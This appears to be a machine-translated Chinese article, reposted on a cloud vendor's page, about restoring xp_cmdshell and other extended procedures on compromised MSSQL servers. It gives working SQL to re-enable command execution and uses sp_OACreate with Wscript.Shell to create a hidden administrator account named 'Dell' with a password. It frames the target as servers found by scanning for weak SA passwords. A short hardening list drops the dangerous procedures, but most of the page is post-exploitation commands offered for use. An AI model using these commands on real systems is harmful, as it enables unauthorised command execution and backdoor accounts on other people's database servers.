Home > Others

Summary of SQL Intrusion recovery xp_cmdshell method _mssql

Source: Internet
Author: User
Tags sql server books
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
Summary of 1433 SQL intrusion recovery xp_cmdshell method
The way to open xp_cmdshell under SQL Server 2005
EXEC sp_configure ' show advanced options ', 1; Reconfigure; EXEC sp_configure ' xp_cmdshell ', 1; Reconfigure;

SQL2005 Open the ' OPENROWSET ' supported method:
exec sp_configure ' show advanced options ', 1; Reconfigure;exec sp_configure ' Ad Hoc distributed Queries ', 1; Reconfigure;

SQL2005 Open the ' sp_OACreate ' supported method:
exec sp_configure ' show advanced options ', 1; Reconfigure;exec sp_configure ' Ole automation procedures ', 1; Reconfigure;

The difficulties of breaking the SA
Common Case Recovery Execution xp_cmdshell
1 failed to locate the stored procedure ' master. Xpcmdshell '.
Recovery method: After the query separator is connected,
First step execution: EXEC sp_addextendedproc xp_cmdshell, @dllname = ' xplog70.dll ' declare @o int
Step two: Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll '
and press the F5 Key command to complete the execution.
2 cannot load DLL Xpsql70.dll or one of the DLLs referenced by the DLL. Reason 126 (The specified module could not be found.) )
Recovery method: After the query separator is connected,
First step: Sp_dropextendedproc "xp_cmdshell"
Step two: Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll '
and press the F5 Key command to complete the execution.
3 The function xp_cmdshell cannot be found in the library Xpweb70.dll. Reason: 127 (The specified program could not be found.) )
Recovery method: After the query separator is connected,
First step: Exec sp_dropextendedproc ' xp_cmdshell '
Step two: Exec sp_addextendedproc ' xp_cmdshell ', ' Xpweb70.dll '
and press the F5 Key command to complete the execution.
Four. The ultimate method.
If none of the above methods are recoverable, try adding the account directly in the following ways:
After the query separator is connected,
2000servser System:
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' C:\Winnt\System32 \cmd.exe/c net user Dell Huxifeng007/add '
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' C:\Winnt\System32 \CMD.EXE/C net localgroup Administrators Dell/add '

XP or 2003server system:
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' c:\windows\ system32\cmd.exe/c net user Dell Huxifeng007/add '
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' c:\windows\ SYSTEM32\CMD.EXE/C net localgroup Administrators Dell/add '

--------------
xp_cmdshell New Approach to recovery
Delete
drop procedure Sp_addextendedproc
drop procedure sp_OACreate
exec sp_dropextendedproc ' xp_cmdshell '

Recovery
DBCC ADDEXTENDEDPROC ("sp_OACreate", "Odsole70.dll")
DBCC ADDEXTENDEDPROC ("xp_cmdshell", "Xplog70.dll")

This can be directly recovered without going to the tube sp_addextendedproc is not there
-----------------------------
To delete a statement that extends the stored procedure xp_cmdshell:
exec sp_dropextendedproc ' xp_cmdshell '

Restore Cmdshell SQL statements
exec sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '

Open the Cmdshell SQL statement
exec sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '

To determine if a storage extension exists
Select COUNT (*) from master.dbo.sysobjects where xtype= ' x ' and name= ' xp_cmdshell '
Return the result is 1 OK
Restore xp_cmdshell
exec master.dbo.addextendedproc ' xp_cmdshell ', ' Xplog70.dll '; select COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' xp_cmdshell '
Return the result is 1 OK
otherwise upload Xplog7.0.dll
exec master.dbo.addextendedproc ' xp_cmdshell ', ' C:\winnt\system32\xplog70.dll '

Block up Cmdshell SQL statements
Sp_dropextendedproc "xp_cmdshell
----------------
Remove SQL Dangerous storage:
Copy Code code as follows:

DROP PROCEDURE sp_makewebtask
EXEC master.. Sp_dropextendedproc xp_cmdshell
EXEC master.. Sp_dropextendedproc Xp_dirtree
EXEC master.. Sp_dropextendedproc xp_fileexist
EXEC master.. Sp_dropextendedproc xp_terminate_process
EXEC master.. Sp_dropextendedproc sp_OAMethod
EXEC master.. Sp_dropextendedproc sp_OACreate
EXEC master.. Sp_dropextendedproc xp_regaddmultistring
EXEC master.. Sp_dropextendedproc Xp_regdeletekey
EXEC master.. Sp_dropextendedproc Xp_regdeletevalue
EXEC master.. Sp_dropextendedproc Xp_regenumkeys
EXEC master.. Sp_dropextendedproc xp_regenumvalues
EXEC master.. Sp_dropextendedproc Sp_add_job
EXEC master.. Sp_dropextendedproc sp_addtask
EXEC master.. Sp_dropextendedproc Xp_regread
EXEC master.. Sp_dropextendedproc xp_regwrite
EXEC master.. Sp_dropextendedproc Xp_readwebtask
EXEC master.. Sp_dropextendedproc Xp_makewebtask
EXEC master.. Sp_dropextendedproc xp_regremovemultistring
EXEC master.. Sp_dropextendedproc sp_OACreate
DROP PROCEDURE Sp_addextendedproc

* No fox attach a way to restore the extended stored procedure

To restore the Sp_addextendedproc first, the statement is as follows:
SQL code:
Copy Code code as follows:

CREATE PROCEDURE sp_addextendedproc---1996/08/30 20:13
@functname nvarchar (517),/* (owner.) The name of function to call/@dllname varchar (255)/* Name of DLL containing function/AS
Set Implicit_transactions off
If @ @trancount > 0
Begin
RAISERROR (15002,-1,-1, ' sp_addextendedproc ')
Return (1)
End
DBCC ADDEXTENDEDPROC (@functname, @dllname)
Return (0)--sp_addextendedproc
Go

Restore all of the extended stored procedures above
SQL code:
Copy Code code as follows:

Use master
exec sp_addextendedproc xp_cmdshell, ' Xp_cmdshell.dll '
exec sp_addextendedproc xp_dirtree, ' Xpstar.dll '
exec sp_addextendedproc xp_enumgroups, ' Xplog70.dll '
exec sp_addextendedproc xp_fixeddrives, ' Xpstar.dll '
exec sp_addextendedproc xp_loginconfig, ' Xplog70.dll '
exec sp_addextendedproc xp_enumerrorlogs, ' Xpstar.dll '
exec sp_addextendedproc xp_getfiledetails, ' Xpstar.dll '
exec sp_addextendedproc sp_OACreate, ' Odsole70.dll '
exec sp_addextendedproc sp_OADestroy, ' Odsole70.dll '
exec sp_addextendedproc sp_OAGetErrorInfo, ' Odsole70.dll '
exec sp_addextendedproc sp_OAGetProperty, ' Odsole70.dll '
exec sp_addextendedproc sp_OAMethod, ' Odsole70.dll '
exec sp_addextendedproc sp_OASetProperty, ' Odsole70.dll '
exec sp_addextendedproc sp_oastop, ' Odsole70.dll '
exec sp_addextendedproc xp_regaddmultistring, ' Xpstar.dll '
exec sp_addextendedproc xp_regdeletekey, ' Xpstar.dll '
exec sp_addextendedproc xp_regdeletevalue, ' Xpstar.dll '
exec sp_addextendedproc xp_regenumvalues, ' Xpstar.dll '
exec sp_addextendedproc xp_regread, ' Xpstar.dll '
exec sp_addextendedproc xp_regremovemultistring, ' Xpstar.dll '
exec sp_addextendedproc xp_regwrite, ' Xpstar.dll '
exec sp_addextendedproc Xp_availablemedia, ' Xpstar.dll '

SQL Server blocked access to the process ' Sys.xp_cmdshell ' of component ' xp_cmdshell ' because this component has been shut down as part of this server security configuration. System administrators can enable ' xp_cmdshell ' by using sp_configure. For more information about enabling ' xp_cmdshell ', see "Perimeter Configuration" in SQL Server Books Online.
Often sweep the SQL weak password The chicken friend should have met such a problem!
Next, we'll take care of him with the SQL statement.
Statement executed by the parser:
EXEC sp_configure ' show advanced options ', 1; Reconfigure; EXEC sp_configure ' xp_cmdshell ', 1; Reconfigure

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
function of method method of sending email signature of method sql injection post method sql recovery model sql database password recovery sql recovery software

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More